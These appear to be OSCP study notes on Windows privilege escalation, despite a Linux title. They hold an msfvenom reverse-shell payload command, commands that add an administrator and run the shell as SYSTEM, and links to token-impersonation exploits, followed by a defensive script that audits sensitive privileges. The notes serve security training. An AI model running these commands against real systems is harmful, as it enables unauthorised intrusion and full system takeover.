Privilege Escalation on Linux


OSCP Notes

  1. msfvenom to spawn a reverse shell on Windows:

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your host> LPORT=<your port> -f exe -o revshell.exe

  2. Adding a user to the Administrators group:

    net localgroup administrators <username> /add

  3. PsExec tool - to escalate from an admin user to full SYSTEM privileges (https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

    .\PsExec64.exe -accepteula -i -s C:\PrivEsc\revshell.exe

  4. winexe command to run commands remotely:

    winexe -U 'admin%<password>' //<ip address> cmd.exe

  5. Hot/Rogue/Juicy/Rotten Potato attacks:

  6. PrintSpoofer exploit
     GitHub: https://github.com/itm4n/PrintSpoofer
     Blog: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

  7. Understanding Windows privileges (whoami /priv)
     References: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672
     https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt

    • SeTcbPrivilege - Act as part of the operating system
    • SeBackupPrivilege - Back up files and directories
    • SeCreateTokenPrivilege - Create a token object
    • SeDebugPrivilege - Debug programs
    • SeEnableDelegationPrivilege - Enable computer and user accounts to be trusted for delegation
    • SeAuditPrivilege - Generate security audits
    • SeImpersonatePrivilege - Impersonate a client after authentication
    • SeLoadDriverPrivilege - Load and unload device drivers
    • SeSecurityPrivilege - Manage auditing and security log
    • SeSystemEnvironmentPrivilege - Modify firmware environment values
    • SeAssignPrimaryTokenPrivilege - Replace a process-level token
    • SeRestorePrivilege - Restore files and directories
    • SeTakeOwnershipPrivilege - Take ownership of files or other objects
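The list above is the set of privileges whose assignment at logon is audited by Event 4672, so it is a useful checklist when reviewing which service and user tokens on a host carry sensitive rights. The following Python script is an added example (not part of the original notes): it parses saved `whoami /priv` output and reports which of these privileges the token holds, split by state. The sample output is constructed.

```python
import re

# Privileges listed above; assigning any of them at logon produces
# Windows Security Event 4672 ("Special privileges assigned to new logon").
SENSITIVE_PRIVILEGES = {
    "SeTcbPrivilege", "SeBackupPrivilege", "SeCreateTokenPrivilege",
    "SeDebugPrivilege", "SeEnableDelegationPrivilege", "SeAuditPrivilege",
    "SeImpersonatePrivilege", "SeLoadDriverPrivilege", "SeSecurityPrivilege",
    "SeSystemEnvironmentPrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
}

# One table row of `whoami /priv`: privilege name, free-text description, state.
_ROW = re.compile(r"^(Se\w+)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(output: str) -> dict:
    """Map privilege name -> "Enabled"/"Disabled" from saved `whoami /priv` text."""
    privs = {}
    for line in output.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def audit_token(output: str) -> dict:
    """Report the sensitive privileges the token holds, grouped by state.

    A 'Disabled' privilege is still present on the token (the process can
    enable it), so it is reported rather than ignored.
    """
    held = {n: s for n, s in parse_whoami_priv(output).items()
            if n in SENSITIVE_PRIVILEGES}
    return {
        "enabled": sorted(n for n, s in held.items() if s == "Enabled"),
        "disabled": sorted(n for n, s in held.items() if s == "Disabled"),
    }


# Constructed sample: typical token of a Windows service account.
SAMPLE_OUTPUT = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    print(audit_token(SAMPLE_OUTPUT))
```

Run it against `whoami /priv > token.txt` output collected from each service host to build an inventory of which accounts hold 4672-class privileges.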

Credits: ippsec, tib3rius

Labs: Linux/Windows PrivEsc workshop - https://github.com/sagishahar/lpeworkshop